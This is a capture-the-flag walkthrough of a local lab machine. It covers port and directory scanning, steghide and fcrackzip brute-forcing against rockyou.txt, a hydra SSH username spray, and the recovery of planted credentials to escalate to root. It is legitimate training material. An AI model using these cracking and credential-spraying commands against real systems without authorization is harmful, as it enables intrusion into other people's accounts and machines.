Skip to main content

HereBash

export TARGET_IP=172.17.0.2
nmap -p0- $TARGET_IP
PORT   STATE SERVICE
22/tcp open ssh
80/tcp open http

Web Server Enumeration

gobuster dir -u http://$TARGET_IP -w /usr/share/wordlists/dirb/common.txt
/scripts (Status: 301) [Size: 310] [--> http://$TARGET_IP/scripts/]

Investigating /scripts/ Directory

Further investigation of the /scripts/ directory revealed two elements:

  • put.php: A PHP file.
  • upload/: An empty directory.

Accessing http://$TARGET_IP/scripts/put.php directly via a web browser resulted in a 405 (Method Not Allowed) error. This is because the browser, by default, sends a GET request, and the file likely expects a different HTTP method.

  • The name put.php strongly suggests that this file might be designed to handle HTTP PUT requests.
  • The presence of an empty upload/ directory further reinforces the hypothesis that this setup could be intended for file uploads.

Confirm PUT Request Handling

curl -X PUT http://$TARGET_IP/scripts/put.php

Results

spongebob

spongebob could be a username but also something else... Like a directory name!

http://172.17.0.2/spongebob/upload has a JPG image. Maybe we have to make some Steganography?

Confirm PUT Request Handling

curl -X PUT http://$TARGET_IP/scripts/put.php

Results

spongebob

The response "spongebob" is ambiguous. It could represent a username, a directory name, or another resource identifier. Further investigation is warranted.

Exploring Potential "spongebob" Resource

Based on the response, we hypothesize that "spongebob" might represent a directory or endpoint. We can test this by directly accessing it via the web server.

Visiting http://$TARGET_IP/spongebob/ in a web browser reveals a directory listing.

Contents of /spongebob/

  • upload/: A subdirectory containing a single image file, ohnorecallwin.jpg.

The presence of an image file raises the possibility of steganography or other data-hiding techniques being employed.

Analyzing ohnorecallwin.jpg

We begin by downloading the ohnorecallwin.jpg file for analysis.

wget http://$TARGET_IP/spongebob/upload/ohnorecallwin.jpg

Extracting Hidden Data with Steghide

We use steghide to attempt data extraction. Since we don't have an initial password, we will iterate through a password list:

#!/bin/bash

while IFS= read -r password; do
# Suppress error messages by redirecting stderr to /dev/null
if steghide extract -sf ohnorecallwin.jpg -p "$password" 2>/dev/null; then
echo "Success with password: $password"
steghide extract -sf ohnorecallwin.jpg -p "$password" # Display output after success
break # Exit the loop after successful extraction
fi
done < /usr/share/wordlists/rockyou.txt

This script efficiently tries passwords from rockyou.txt. The output reveals the correct password:

Success with password: spongebob
wrote extracted data to "seguro.zip".

Unzipping seguro.zip

The extracted seguro.zip archive is password-protected. We employ fcrackzip with rockyou.txt for a dictionary attack:

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt seguro.zip

This yields the password for seguro.zip:

PASSWORD FOUND!!!!: pw == chocolate

We then unzip the archive:

unzip seguro.zip
Archive: seguro.zip
[seguro.zip] secreto.txt password:
inflating: secreto.txt

Extracting the Hidden Message

The contents of secreto.txt are:

cat secreto.txt
aprendemos

The extracted message "aprendemos" is likely a credential or part of a credential, possibly a password or keyword.

SSH Username Enumeration and Exploitation

Given that port 22 (SSH) is open and we have a potential password ("aprendemos"), we attempt to enumerate valid SSH usernames using hydra.

Wordlist Selection:

For username enumeration, specialized wordlists are more effective than general password lists like rockyou.txt. The seclists project (https://github.com/danielmiessler/SecLists) offers a comprehensive collection of username lists under the Usernames directory. In this case, we will use xato-net-10-million-usernames.txt which could be found in SecLists.

Hydra Command for Username Enumeration:

hydra -L ~/Downloads/xato-net-10-million-usernames.txt -p aprendemos ssh://172.17.0.2 -f

Results:

[22][ssh] host: 172.17.0.2   login: rosa   password: aprendemos

SSH Access and Initial Foothold

Using the discovered credentials, we establish an SSH connection:

ssh rosa@$TARGET_IP

Exploring Rosa's Home Directory:

Upon successful login, we navigate to an unusual directory:

cd ./-

Listing the directory contents reveals numerous files and directories following a pattern:

ls
buscaelpass1 buscaelpass14 buscaelpass19 buscaelpass23 buscaelpass28 buscaelpass32 buscaelpass37 buscaelpass41 buscaelpass46 buscaelpass50 buscaelpass55 buscaelpass6 buscaelpass64 buscaelpass8
buscaelpass10 buscaelpass15 buscaelpass2 buscaelpass24 buscaelpass29 buscaelpass33 buscaelpass38 buscaelpass42 buscaelpass47 buscaelpass51 buscaelpass56 buscaelpass60 buscaelpass65 buscaelpass9
buscaelpass11 buscaelpass16 buscaelpass20 buscaelpass25 buscaelpass3 buscaelpass34 buscaelpass39 buscaelpass43 buscaelpass48 buscaelpass52 buscaelpass57 buscaelpass61 buscaelpass66 creararch.sh
buscaelpass12 buscaelpass17 buscaelpass21 buscaelpass26 buscaelpass30 buscaelpass35 buscaelpass4 buscaelpass44 buscaelpass49 buscaelpass53 buscaelpass58 buscaelpass62 buscaelpass67
buscaelpass13 buscaelpass18 buscaelpass22 buscaelpass27 buscaelpass31 buscaelpass36 buscaelpass40 buscaelpass45 buscaelpass5 buscaelpass54 buscaelpass59 buscaelpass63 buscaelpass7

We also find a script named creararch.sh.

Analyzing creararch.sh:

cat creararch.sh

The script's contents are:

#!/bin/bash

# Buscamos directorios que empiezan con "busca"
for directorio in busca*; do
# Comprobamos si el directorio existe
if [ -d "$directorio" ]; then
# Crearmos 50 archivos y les metemos el contenido xx
for i in {1..50}; do
touch "$directorio/archivo$i" && echo "xxxxxx:xxxxxx" > "$directorio/archivo$i"
done
echo "Se crearon 50 archivos en $directorio"
else
echo "El directorio $directorio no existe"
fi
done

This script creates 50 files within each directory starting with "busca" and fills them with the string "xxxxxx:xxxxxx".

Identifying Files with Anomalous Content

We can infer that one of these files might contain credentials or valuable information. We devise a script to identify files that deviate from the standard 14-byte size established by creararch.sh (or we could just filter out "xxxxxx:xxxxxx" using grep):

#!/bin/bash

# Loop through all "buscaelpass" directories
for dir in buscaelpass*; do
# Loop through all files in each directory
for file in "$dir"/*; do
# Get the size of the file
size=$(stat -c %s "$file")

# Check if the size is different from 14 bytes
if [[ "$size" != "14" ]]; then
echo "Found file with different size: $file"
# Optionally, display the file content:
cat "$file"
fi
done
done
Found file with different size: buscaelpass33/archivo21
pedro:ell0c0

Privilege Escalation: pedro

su pedro

In pedro's home directory, we found another directory named .... Inside that we found a file called .misecreto.

cd .../
cat .misecreto
> Consegui el pass de juan y lo tengo escondido en algun lugar del sistema fuera de mi home.

Locating Juan's Password:

We search for files owned by pedro outside his home directory, excluding the /proc filesystem:

find / -type f -user pedro 2>/dev/null | grep -v "proc"

This command reveals several files, including a particularly interesting one:

/home/pedro/.../.misecreto
/home/pedro/.bashrc
/home/pedro/.bash_logout
/home/pedro/.profile
/home/pedro/.cache/motd.legal-displayed
/var/mail/.pass_juan

We examine the contents of /var/mail/.pass_juan:

cat /var/mail/.pass_juan
ZWxwcmVzaW9uZXMK

The content "ZWxwcmVzaW9uZXMK" seems to be Base64 encoded. Actually we do not need to decode it.

su juan

Privilege Escalation: juan

We find an interesting file named .ordenes_nuevas in juan's home directory:

cat .ordenes_nuevas
> Hola soy tu patron y me canse y me fui a casa te dejo mi pass en un lugar a mano consiguelo y acaba el trabajo.

This message suggests that juan's boss has left his password somewhere easily accessible.

We inspect juan's .bashrc file.

nano .bashrc

The file reveals an unusual alias:

# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias pass='eljefe'
alias l='ls -CF'

The alias pass='eljefe' is highly suspicious, suggesting that "eljefe" might be a password.

Privilege Escalation: root

We attempt to use the discovered password to escalate to root:

su root
Password: eljefe

The password "eljefe" is accepted, granting us root privileges:

id
uid=0(root) gid=0(root) groups=0(root)